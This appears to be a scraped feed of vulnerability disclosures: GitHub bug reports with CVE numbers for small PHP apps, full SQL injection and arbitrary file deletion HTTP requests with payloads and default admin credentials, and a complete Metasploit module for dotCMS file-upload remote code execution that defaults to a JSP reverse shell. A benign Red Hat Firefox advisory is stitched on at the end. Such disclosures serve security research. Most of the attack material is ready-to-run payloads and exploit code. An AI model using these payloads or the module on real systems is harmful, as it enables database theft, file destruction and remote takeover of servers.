Rescue Dispatch Management System v1.0 is vulnerable to SQL injection via /rdms/classes/Master.php?f=delete_incident.

Permalink

Cannot retrieve contributors at this time

**Rescue Dispatch Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15296/rescue-dispatch-management-system-phpoop-free-source-code.html

Vulnerability File: /rdms/classes/Master.php?f=delete\_incident

Vulnerability location: /rdms/classes/Master.php?f=delete\_incident, id

\[+\] Payload: id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /rdms/classes/Master.php?f\=delete\_incident HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/rdms/admin/?page=incidents
Content-Length: 65
Cookie: PHPSESSID=hkbchcmaitn0d8enhm4jtdjk9q
Connection: close
id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-31952: bug_report/SQLi-3.md at main · k0xx11/bug_report

Rescue Dispatch Management System v1.0 is vulnerable to SQL Injection via /rdms/classes/Master.php?f=delete_respondent_type.

Permalink

Cannot retrieve contributors at this time

**Rescue Dispatch Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15296/rescue-dispatch-management-system-phpoop-free-source-code.html

Vulnerability File: /rdms/classes/Master.php?f=delete\_respondent\_type

Vulnerability location: /rdms/classes/Master.php?f=delete\_respondent\_type, id

\[+\] Payload: id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /rdms/classes/Master.php?f\=delete\_respondent\_type HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/rdms/admin/?page=respondent\_types
Content-Length: 65
Cookie: PHPSESSID=hkbchcmaitn0d8enhm4jtdjk9q
Connection: close
id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-31951: bug_report/SQLi-4.md at main · k0xx11/bug_report

Rescue Dispatch Management System v1.0 is vulnerable to Delete any file via /rdms/classes/Master.php?f=delete_img.

**Rescue Dispatch Management System v1.0 by oretnom23 has Delete any file**

vendors: https://www.sourcecodester.com/php/15296/rescue-dispatch-management-system-phpoop-free-source-code.html

Vulnerability File: /rdms/classes/Master.php?f=delete\_img

Vulnerability location: /rdms/classes/Master.php?f=delete\_img, path

The password for the backend login account is: admin/admin123

Payload:

Here we delete the shell.php file in the root directory

POST /rdms/classes/Master.php?f\=delete\_img HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/rdms/admin/?page=system\_info
Content-Length: 45
Cookie: PHPSESSID=hkbchcmaitn0d8enhm4jtdjk9q
Connection: close
path=C%3A%2Fxampp%2Fhtdocs%2Frdms%2Fshell.php

The file path needs to be encoded by url

Currently, when we do not send a request to delete the shell.php file, the shell.php file is still in the root directory of the website

The response package shows that the deletion was successful. Let's go to the root directory to see if the shell.php file still exists.

By this time, shell.php has been deleted.

CVE-2022-31945: bug_report/delet-file-1.md at main · k0xx11/bug_report

Rescue Dispatch Management System v1.0 is vulnerable to SQL Injection via /rdms/classes/Master.php?f=delete_report.

Permalink

Cannot retrieve contributors at this time

**Rescue Dispatch Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15296/rescue-dispatch-management-system-phpoop-free-source-code.html

Vulnerability File: /rdms/classes/Master.php?f=delete\_report

Vulnerability location: /rdms/classes/Master.php?f=delete\_report, id

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /rdms/classes/Master.php?f\=delete\_report HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/rdms/admin/?page=incident\_reports
Content-Length: 65
Cookie: PHPSESSID=hkbchcmaitn0d8enhm4jtdjk9q
Connection: close
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-31948: bug_report/SQL-1.md at main · k0xx11/bug_report

Rescue Dispatch Management System v1.0 is vulnerable to SQL Injection via /rdms/classes/Master.php?f=delete_team.

Permalink

Cannot retrieve contributors at this time

**Rescue Dispatch Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15296/rescue-dispatch-management-system-phpoop-free-source-code.html

Vulnerability File: /rdms/classes/Master.php?f=delete\_team

Vulnerability location: /rdms/classes/Master.php?f=delete\_team, id

\[+\] Payload: id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /rdms/classes/Master.php?f\=delete\_team HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/rdms/admin/?page=teams
Content-Length: 65
Cookie: PHPSESSID=hkbchcmaitn0d8enhm4jtdjk9q
Connection: close
id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-31946: bug_report/SQL-2.md at main · k0xx11/bug_report

Online Fire Reporting System v1.0 is vulnerable to Delete any file via /ofrs/classes/Master.php?f=delete_img.

**Online Fire Reporting System v1.0 by oretnom23 has Delete any file**

vendors: https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html

Vulnerability File: /ofrs/classes/Master.php?f=delete\_img

Vulnerability location: /ofrs/classes/Master.php?f=delete\_img, path

The password for the backend login account is: admin/admin123

Payload:

Here we delete the shell.php file in the root directory

POST /ofrs/classes/Master.php?f\=delete\_img HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/ofrs/admin/?page=system\_info
Content-Length: 62
Cookie: PHPSESSID=qq2e8htekg3g2rkgtbq38p0jnv
Connection: close
path=C%3A%2Fxampp%2Fhtdocs%2Fofrs%2Fshell.php

The file path needs to be encoded by url

Currently, when we do not send a request to delete the shell.php file, the shell.php file is still in the root directory of the website

The response package shows that the deletion was successful. Let's go to the root directory to see if the shell.php file still exists.

By this time, shell.php has been deleted.

CVE-2022-31973: bug_report/delet-file-1.md at main · k0xx11/bug_report

EGavilan Media User-Registration-and-Login-System-With-Admin-Panel 1.0 is vulnerable to SQL Injection via profile_action - update_user. This allows a remote attacker to compromise Application SQL database.

**Hi  
I found a SQL injection vulnerability User-Registration-and-Login-System-With-Admin-Panel**

POST /User-Registration-and-Login-System-With-Admin-Panel-master/profile_action.php HTTP/1.1  
Host: 192.168.1.3  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 82  
Origin: http://192.168.1.3  
Connection: close  
Referer: http://192.168.1.3/User-Registration-and-Login-System-With-Admin-Panel-master/profile.php  
Cookie: PHPSESSID=54cet827kpno5c9g9i9grjq84h

fullname=test2'%2b(select*from(select(sleep(20)))a)%2b'&username=test1&email=test%40test.com&gender=Male&action=update_user

Above query will only sleep database for 20 second but Using SQLmap bad user can dump the database as show in image.

****

Control -  
User inputs consumed by the application should be sanitized based on the data type and data sets. For example, user input for age should only be allowed to contain numbers. Blacklist approach where certains characters and keywords are sanitized is not recommended.

Remediation -  
To prevent this follow the following steps:  
a) Validate all input data against a whitelist

b) Use of parameterized queries  
String selectStatement = "SELECT \* FROM User WHERE userId = ? ";  
PreparedStatement prepStmt = con.prepareStatement(selectStatement);  
prepStmt.setString(1, userId);  
ResultSet rs = prepStmt.executeQuery();

CVE-2021-44096: Vulnerability/BUG - SQL Injection on "profile_action - update_user" · Issue #2 · EGavilan-Media/User-Registration-and-Login-System-With-Admin-Panel

EGavilan Media Expense-Management-System 1.0 is vulnerable to SQL Injection via /expense_action.php. This allows a remote attacker to compromise Application SQL database.

**\# Exploit Title : SQL injection vulnerability in EGavilan Media Expense-Management-System 1.0 via /expense\_action.php. that allows a remote attacker to compromise Application SQL database.**

#Exploit Author : Shubham Pandey

#Vendor : EGavilan Media

#Application Link : https://egavilanmedia.com/expense-management-system/

#Github Link: https://github.com/EGavilan-Media/Expense-Management-System

#Version: 1.0

\# CVE Link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44098

**\# CVE:** CVE-2021–44098

**What is SQL injection :**

SQL injection is a type of online security flaw that allows an attacker to interfere with a web application’s database queries. It allows an attacker to see data that they wouldn’t ordinarily be able to see. This could include data belonging to other users or any other information that the app has access to. In many circumstances, an attacker can modify or remove this data, causing the application’s content or behavior to be permanently altered.

**Attack Vector:**

By exploiting the login Page parameters Using tool like SQLMAP An attacker can dump entire data from the database. The data dumped can further lead to tampering the confidentiality of the user s personal, transaction details and financial information, various session tokens of the users etc. The data obtained can also be publicly disclosed or used for competitive gains leading to financial loss to an organization.

**Vulnerable Parameter:** “description=”

**Steps to Reproduce:**

1.  Put = ‘%2b(select\*from(select(sleep(20)))a)%2b’ and verify SQL Database response, if response come after 20 sec that mean Application SQL database is passing given query.

> _Login page request -  
> _POST //Expense-Management-System-master/expense_action.php HTTP/1.1  
> Host: 192.168.1.6  
> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
> Accept: application/json, text/javascript, */*; q=0.01  
> Accept-Language: en-US,en;q=0.5  
> Accept-Encoding: gzip, deflate  
> Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
> X-Requested-With: XMLHttpRequest  
> Content-Length: 113  
> Origin: http://192.168.1.6  
> Connection: close  
> Referer: http://192.168.1.6//Expense-Management-System-master/  
> Cookie: PHPSESSID=8jp0c36flam1krptku4bq9hvf5
> 
> description=seafood'%2b(select*from(select(sleep(20)))a)%2b'&amount=3.21&date=2019-08-02&expense_id=2&action=Edit

3\. Web Server accept our Payload and by using tools like “Sqlmap” we can see that payload gets executed and Database can be compromised.

**Author:** https://www.linkedin.com/in/shubham-pandey-10704014b/

CVE-2021-44098: CVE-2021–44098 - Shubham pandey - Medium

When files are uploaded into dotCMS via the content API, but before they become content, dotCMS writes the file down in a temporary directory. In the case of this vulnerability, dotCMS does not sanitize the filename passed in via the multipart request header and thus does not sanitize the temporary file's name. This allows an attacker to use a specially crafted request to POST files to dotCMS via the ContentResource API that gets written outside of the dotCMS temporary directory. In the case of this exploit, an attacker can upload a specially crafted .jsp file to the webapp/ROOT directory of dotCMS which can allow for remote code execution.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'DotCMS RCE via Arbitrary File Upload.',        'Description' => %q{          When files are uploaded into dotCMS via the content API, but before they become content, dotCMS writes the          file down in a temp directory.  In the case of this vulnerability, dotCMS does not sanitize the filename          passed in via the multipart request header and thus does not sanitize the temp file's name.  This allows a          specially crafted request to POST files to dotCMS via the ContentResource (POST /api/content)  that get          written outside of the dotCMS temp directory.  In the case of this exploit, an attacker can upload a special          .jsp file to the webapp/ROOT directory of dotCMS which can allow for remote code execution.        },        'Author' => [          'Shubham Shah',  # Discovery and analysis          'Hussein Daher', # Discovery and analysis          'jheysel-r7'     # Metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2022-26352'],          ['URL', 'https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/']        ],        'Privileged' => false,        'Platform' => %w[linux win],        'Targets' => [          [            'Java Linux',            {              'Arch' => ARCH_JAVA,              'Platform' => 'linux'            }          ],          [            'Java Windows',            {              'Arch' => ARCH_JAVA,              'Platform' => 'win'            }          ]        ],        'DisclosureDate' => '2022-05-03',        'DefaultTarget' => 0,        'DefaultOptions' => {          'SSL' => true,          'PAYLOAD' => 'java/jsp_shell_reverse_tcp'        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]        }      )    )    register_options([      Opt::RPORT(8443),      OptString.new('TARGETURI', [true, 'Base path', '/'])    ])  end  def check    test_content = Rex::Text.rand_text_alpha(10)    test_file = "#{test_content}.jsp"    test_path = "../../#{test_file}"    uuid = Faker::Internet.uuid    jsp = <<~EOS      <%@ page import=\"java.io.File\" %>      <%        File jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + "#{test_file}");        jsp.delete();      %>      #{uuid}    EOS    vars_form_data = [      {        'name' => 'name',        'data' => jsp,        'encoding' => nil,        'filename' => test_path,        'mime_type' => 'text/plain'      }    ]    send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/api/content/'),      'vars_form_data' => vars_form_data    )    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, test_file.to_s)    )    if res && res.body.include?(uuid)      return Exploit::CheckCode::Vulnerable    end    Exploit::CheckCode::Safe  end  def write_jsp_payload    jsp_path = "../../#{jsp_filename}"    print_status('Writing JSP payload')    vars_form_data = [      {        'name' => 'name',        'data' => payload.encoded,        'encoding' => nil,        'filename' => jsp_path,        'mime_type' => 'text/plain'      }    ]    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/api/content/'),      'vars_form_data' => vars_form_data    )    unless res&.code == 500      fail_with(Failure::NotVulnerable, 'Failed to write JSP payload')    end    register_file_for_cleanup("../webapps/ROOT/#{jsp_filename}")    print_good('Successfully wrote JSP payload')  end  def execute_jsp_payload    jsp_uri = normalize_uri(target_uri.path, jsp_filename)    print_status('Executing JSP payload')    res = send_request_cgi(      'method' => 'GET',      'uri' => jsp_uri    )    unless res&.code == 200      fail_with(Failure::PayloadFailed, 'Failed to execute JSP payload')    end    print_good('Successfully executed JSP payload')  end  def exploit    write_jsp_payload    execute_jsp_payload  end  def jsp_filename    @jsp_filename ||= "#{rand_text_alphanumeric(8..16)}.jsp"  endend

dotCMS Shell Upload

Red Hat Security Advisory 2022-4875-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 91.10.0 ESR. Issues addressed include a buffer overflow vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:4875-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:4875  
Issue date:        2022-06-01  
CVE Names:         CVE-2022-31736 CVE-2022-31737 CVE-2022-31738  
                   CVE-2022-31740 CVE-2022-31741 CVE-2022-31742  
                   CVE-2022-31747  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.4  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.4) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 91.10.0 ESR.

Security Fix(es):

* Mozilla: Cross-Origin resource's length leaked (CVE-2022-31736)

* Mozilla: Heap buffer overflow in WebGL (CVE-2022-31737)

* Mozilla: Browser window spoof using fullscreen mode (CVE-2022-31738)

* Mozilla: Register allocation problem in WASM on arm64 (CVE-2022-31740)

* Mozilla: Uninitialized variable leads to invalid memory read  
(CVE-2022-31741)

* Mozilla: Memory safety bugs fixed in Firefox 101 and Firefox ESR 91.10  
(CVE-2022-31747)

* Mozilla: Querying a WebAuthn token with a large number of allowCredential  
entries may have leaked cross-origin information (CVE-2022-31742)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2092018 - CVE-2022-31736 Mozilla: Cross-Origin resource's length leaked  
2092019 - CVE-2022-31737 Mozilla: Heap buffer overflow in WebGL  
2092021 - CVE-2022-31738 Mozilla: Browser window spoof using fullscreen mode  
2092023 - CVE-2022-31740 Mozilla: Register allocation problem in WASM on arm64  
2092024 - CVE-2022-31741 Mozilla: Uninitialized variable leads to invalid memory read  
2092025 - CVE-2022-31742 Mozilla: Querying a WebAuthn token with a large number of allowCredential entries may have leaked cross-origin information  
2092026 - CVE-2022-31747 Mozilla: Memory safety bugs fixed in Firefox 101 and Firefox ESR 91.10

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.4):

Source:  
firefox-91.10.0-1.el8_4.src.rpm

aarch64:  
firefox-91.10.0-1.el8_4.aarch64.rpm  
firefox-debuginfo-91.10.0-1.el8_4.aarch64.rpm  
firefox-debugsource-91.10.0-1.el8_4.aarch64.rpm

ppc64le:  
firefox-91.10.0-1.el8_4.ppc64le.rpm  
firefox-debuginfo-91.10.0-1.el8_4.ppc64le.rpm  
firefox-debugsource-91.10.0-1.el8_4.ppc64le.rpm

s390x:  
firefox-91.10.0-1.el8_4.s390x.rpm  
firefox-debuginfo-91.10.0-1.el8_4.s390x.rpm  
firefox-debugsource-91.10.0-1.el8_4.s390x.rpm

x86_64:  
firefox-91.10.0-1.el8_4.x86_64.rpm  
firefox-debuginfo-91.10.0-1.el8_4.x86_64.rpm  
firefox-debugsource-91.10.0-1.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-31736  
https://access.redhat.com/security/cve/CVE-2022-31737  
https://access.redhat.com/security/cve/CVE-2022-31738  
https://access.redhat.com/security/cve/CVE-2022-31740  
https://access.redhat.com/security/cve/CVE-2022-31741  
https://access.redhat.com/security/cve/CVE-2022-31742  
https://access.redhat.com/security/cve/CVE-2022-31747  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYpgd4tzjgjWX9erEAQi2ig//cEjyYdU0zxx52YJvfHWfkRVx/G0rG6Ge  
3ogK1IKYRgbXhqB7dCb7fCp+IzfOmOnee4aCadnKolfH6YjsPZe6Ij5CDv/qZPus  
LkvkEU4YJhOCwnn+MhECTd8oOPhJIaXVOpPTpvaEpbcE26+L6bsM+x+Czz21EffF  
+whsiPwG/KnvuXlo2Y91dCl7+FyiGS1DMiHDWbKntgWveRvXntj2UNZd5HcMkOus  
teHrkqNmGVYUeFSI8gZ3GF2kHMzF9G26Zc2zJIG91TB0Hp0VohXFXBR3WHzqYoGN  
oCkTEhStSO5AzW3as9aqJaSGAN7xXqTZfnH9Qa8SRPLz2K7n7FD/MeKsuD3tA8SK  
QGlsTeZz3a/wBhy6gGA/TdR4kLMzu13zkXmOJdknUpnG4abx7A2SpDRaUpd/RFEG  
jl0PvlDRKe7Rk25WZg7p1U6geBD8WhHorEt9Zl16Ty2hbvj9C0+CysOCDhnOlsGY  
ZO/zSdpwoQAX3TGDPVUhnSVqEdOikEUxt9r1oLNVXSmMsxOi//hw2tPRf1gWIUYW  
sTc7UtV2H+55O0qeYjD168wtQsXkOZ+LuuYp1MIiHfvYGDVogXGAxuehuPClTvtG  
GwvPG9bHihK4Ub5WbCFUWd5mtYKWdsMhTaOZrvlINWAjATS1EGDPyhhXWCnLUQSF  
6EG7gSnwA6c=Et91  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#java